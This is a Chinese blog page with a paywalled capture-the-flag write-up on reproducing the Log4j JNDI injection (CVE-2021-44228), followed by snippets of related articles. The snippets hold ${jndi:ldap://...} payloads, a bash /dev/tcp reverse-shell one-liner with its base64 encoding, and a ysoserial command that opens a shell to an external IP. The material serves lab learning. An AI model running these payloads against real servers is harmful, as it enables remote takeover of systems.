ctfshow log4j复现 wp|CVE-2021-44228

最新推荐文章于 2025-02-25 11:12:10 发布
最新推荐文章于 2025-02-25 11:12:10 发布
阅读量5k 收藏 6
点赞数 2
分类专栏: javaWeb安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hiahiaQ_Q/article/details/123720995
版权
本文详细介绍了利用Log4j漏洞进行JNDI注入以反弹shell的过程。首先通过DNSlog检测漏洞存在,然后使用JNDIExploit工具设置本地LDAP服务器,并利用Base64编码的payload发起攻击。在成功反弹shell后,作者讨论了实验中遇到的问题,如SSH连接稳定性、靶场环境不稳定和工具使用不熟悉等。最后,总结了整个利用流程,并提醒注意JDK版本对利用的影响。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前置知识

LDAP

轻量级的目录搜寻协议,提供目录服务

JNDI

Java的一个接口,JNDI避免了程序与数据库之间的紧耦合

我们平常说的 LDAP Server,一般指的是安装并配置了 Active Directory、OpenLDAP 这些程序的服务器

dnslog

A记录:Address 域名对应的IP地址

DNSlog平台各种利用姿势

做题思路

进入题目界面如下

image-20220324185805622

check

首先测试下漏洞是否存在,可以利用dnslog平台检测漏洞是否存在

访问dnslog.cn

image-20220324190535167

输入检测payload

最低0.47元/天 解锁文章
WordPress BuddyPress 越权RCE漏洞复现CVE-2021-21389)
0xSec
01-13 2099
BuddyPress 是WordPress母公司的一个全新的开源程序,BuddyPress 从本质上说其实是 WordPress 的插件。BuddyPress 把 WordPress的关注点从博客转移到了社区。当然,用户还是能够使用WordPress的所有的博客功能,只是当用户使用 BuddyPress 时,第一要做的是创建他们个人档案,第二才是写博客。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。
buuctf漏洞复现log4j
m0_74741186的博客
01-04 662
什么是log4j,是apache下的java应用常见的开源日志库,也就是java语言,中间件为apache。但是400错误了,于是在网上找了400错误是什么。那就是服务器处理不了的请求,发现那个payload也可以,我看网上多写了空格!也是需要url编码的。我在网上好像看到答案了,说是400错误是由于,客户端传输过程中进行解码了。是用这个${jndi:ldap://xyr4kk.dnslog.cn}发现有传入参数,于是在网上找了可以传入dnslog的域名。我的猜想是对的,但是不是用那个payload解的,
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2992
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
vulfocus上的java反序列化漏洞复现
最新发布
2401_84223077的博客
02-25 266
使用利用工具。
ctfshow Log4j复现wp
weixin_52829570的博客
01-14 3061
声明: 该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码 注:IP填vps公网ip,PORT要和nc监听的端口对应 bash -i >& /dev/tcp/IP/PORT 0>&1 # => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE= # => Ym
ctfshow-Log4j复现-log4j复现
wrypot的博客
08-21 913
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS,打开mobax进行ssh连接,开两个终端。
ctfshow—web—Log4j复现
HAI_WD的博客
09-03 738
利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit。
Log4j复现
qq_56150805的博客
05-06 344
复现: 1.准备好vps服务器 2.安装ldap服务器 3.开启ldap服务器 4.监听nc -lvnp 1099 5.设置playload 6.cd / 回车 cat ctfshowflag 可见flag: ctfshow{cd64d28e-e9d9-4636-837a-7447c989aa5e}
nginx平滑升级解决 nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372)
web13116256725的博客
09-10 1333
关于漏洞扫描nginx安全漏洞的修复。服务器漏洞扫描中扫出了nginx的安全漏洞,nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372),受影响版本为0.6.18-1.20.0;给出解决办法为升级补丁修复,由于漏洞较多考虑平滑升级。提示:以下是本篇文章正文内容,下面案例可供参考以上就是对nginx 安全漏洞进行处理平滑升级的内容,本文仅仅简单记录了自己工作中处理的问题,不一定适用于所有情况,仅供大家参考。
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3690
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 8260
log4j漏洞原理和靶场复现
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4648
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4335
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
NSSCTF实战:Apache log4j漏洞靶机(CVE-2021-44228)
weixin_52270928的博客
05-09 662
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对用户输入内容进行严格的判断,从而造成漏洞的发生。
log4j2靶场复现遇见的问题学习记录
m0_69546873的博客
09-06 1184
掌控安全log4j2靶场学习及其他log4j2靶场的延申学习
Apache Log4j CVE-2021-44228漏洞利用工具分析
CVE-2021-44228是一个非常严重的安全漏洞,存在于Apache Log4j版本2.x中,此漏洞允许攻击者通过向受影响的应用程序发送精心构造的输入,利用JNDI(Java Naming and Directory Interface)API中的查找功能,执行远程...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值